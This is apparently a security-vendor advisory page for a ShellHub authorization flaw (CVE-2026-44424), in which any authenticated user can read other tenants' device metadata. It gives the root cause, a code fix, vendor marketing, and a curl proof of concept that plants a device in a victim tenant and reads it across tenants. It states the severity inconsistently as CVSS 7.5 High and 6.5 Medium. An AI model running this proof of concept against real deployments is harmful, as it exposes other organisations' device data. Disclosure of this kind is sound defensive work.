CVE-2026-44424

CVE-2026-44424 is a medium-severity security vulnerability in github.com/shellhub-io/shellhub (go), affecting versions <= 0.24.1. It is fixed in 0.24.2.

Summary

GET /api/devices/:uid returns the full device object whenever the caller is authenticated, without verifying that the device belongs to the caller's namespace (tenant). Any authenticated user (JWT or API Key) who knows or can guess a device UID can read device metadata from any other namespace.

Severity

CVSS 3.1: 7.5 (High)
CWE-639, Authorization Bypass Through User-Controlled Key

Affected versions

ShellHub Community v0.24.1 (validated). Likely all prior versions that share this handler.

Root cause

api/services/device.go:97-104, GetDevice resolves the device by UID without scoping to the caller's tenant:

func (s *service) GetDevice(ctx context.Context, uid models.UID) (*models.Device, error) {
    device, err := s.store.DeviceResolve(ctx, store.DeviceUIDResolver, string(uid))
    // ⚠️ missing: s.store.Options().InNamespace(tenant)
    ...
}

Compare with DeleteDevice in the same file (line 137) which correctly applies InNamespace(tenant).

The Authorize middleware (api/routes/middleware/authorize.go:12-27) only checks that a tenant is present in the context, not that the resource belongs to that tenant.

Proof of concept (validated live against v0.24.1)

Pre-requisite: attacker has any valid user account and knows a target tenant_id (UUIDs frequently leak via UI URLs, email invites, support channels, or prior namespace membership).

ATTACKER_TOKEN=$(curl -s -X POST http://target/api/login \
  -H 'Content-Type: application/json' \
  -d '{"username":"attacker","password":"..."}' | jq -r .token)

TARGET_TENANT="<victim-tenant-uuid>"

# Plant a device in the victim tenant via the public device-auth endpoint
# (this also works when the victim already has devices and the attacker
# merely guessed/obtained a real UID via another vector)
VICTIM_UID=$(curl -s -X POST http://target/api/devices/auth \
  -H 'Content-Type: application/json' \
  -d "{
    \"info\":{\"id\":\"x\",\"pretty_name\":\"x\",\"version\":\"v0.24.1\",\"arch\":\"amd64\",\"platform\":\"docker\"},
    \"hostname\":\"poc\",
    \"identity\":{\"mac\":\"aa:bb:cc:dd:ee:ff\"},
    \"public_key\":\"-----BEGIN RSA PUBLIC KEY-----\\nx\\n-----END RSA PUBLIC KEY-----\",
    \"tenant_id\":\"$TARGET_TENANT\"
  }" | jq -r .uid)

# Read the device from a completely different tenant
curl -i "http://target/api/devices/$VICTIM_UID" \
  -H "Authorization: Bearer $ATTACKER_TOKEN"
# Expected (fixed):   HTTP 403/404
# Observed (v0.24.1): HTTP 200 + full device JSON (tenant_id, public_key, MAC,
#                     namespace name, OS info, last_seen, remote_addr, ...)

Impact

  • Cross-tenant disclosure of device metadata: hostname, MAC, OS fingerprint, public SSH key, namespace name, last-seen timestamp, remote address.
    • Enables namespace enumeration, device inventory reconnaissance of other tenants, and targeted follow-up attacks.

CVE-2026-44424 has a CVSS score of 6.5 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.24.2); upgrading removes the vulnerable code path.

Affected versions

github.com/shellhub-io/shellhub (<= 0.24.1)

Security releases

github.com/shellhub-io/shellhub → 0.24.2 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

In api/services/device.go GetDevice, extract tenant from context and apply InNamespace:

func (s *service) GetDevice(ctx context.Context, uid models.UID) (*models.Device, error) {
    tenant := gateway.TenantFromContext(ctx)
    opts := []store.QueryOption{}
    if tenant != nil {
        opts = append(opts, s.store.Options().InNamespace(tenant.ID))
    }
    device, err := s.store.DeviceResolve(ctx, store.DeviceUIDResolver, string(uid), opts...)
    ...
}

Frequently Asked Questions

  1. What is CVE-2026-44424? CVE-2026-44424 is a medium-severity security vulnerability in github.com/shellhub-io/shellhub (go), affecting versions <= 0.24.1. It is fixed in 0.24.2.
  2. How severe is CVE-2026-44424? CVE-2026-44424 has a CVSS score of 6.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/shellhub-io/shellhub are affected by CVE-2026-44424? github.com/shellhub-io/shellhub (go) versions <= 0.24.1 is affected.
  4. Is there a fix for CVE-2026-44424? Yes. CVE-2026-44424 is fixed in 0.24.2. Upgrade to this version or later.
  5. Is CVE-2026-44424 exploitable, and should I be worried? Whether CVE-2026-44424 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-44424 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-44424? Upgrade github.com/shellhub-io/shellhub to 0.24.2 or later.

Other vulnerabilities in github.com/shellhub-io/shellhub

CVE-2026-44426CVE-2026-44425CVE-2026-44424

Stop the waste.
Protect your environment with Kodem.